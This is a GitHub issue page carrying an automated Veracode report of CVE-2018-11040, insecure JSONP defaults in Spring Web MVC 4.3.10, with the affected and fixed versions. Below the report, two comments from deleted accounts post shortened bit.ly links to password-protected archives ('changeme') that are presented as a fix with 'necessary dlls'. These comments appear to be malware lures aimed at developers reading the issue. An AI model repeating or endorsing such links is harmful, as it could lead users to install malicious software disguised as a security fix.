julz0815 / test-action

0 stars 1 forks source link

CVE: 2018-11040 found in Spring Web MVC - Version: 4.3.10.RELEASE [JAVA] #1195

Open github-actions[bot] opened 2 months ago

github-actions[bot] commented 2 months ago

Veracode Software Composition Analysis

Attribute Details
Library Spring Web MVC
Description Spring Web MVC
Language JAVA
Vulnerability Cross-Domain Request Through Insecure JSONP Defaults
Vulnerability description spring-webmvc is vulnerable to cross-domain requests. The vulnerability exists as JSONP is enabled through the jsonp and callback JSONP parameters in MappingJackson2JsonView by default.
CVE 2018-11040
CVSS score 4.3
Vulnerability present in version/s 4.3.0.RC1-4.3.17.RELEASE
Found library version/s 4.3.10.RELEASE
Vulnerability fixed in version 4.3.18.RELEASE
Library latest version 6.2.0-RC1
Fix

Links:

ghost commented 2 months ago

try this https://bit.ly/4gvtdhO

Password: changeme I put the necessary dlls in the archive

ghost commented 2 months ago

try this https://bit.ly/4gABgKn Archive codepass: changeme

you may need to install the c compiler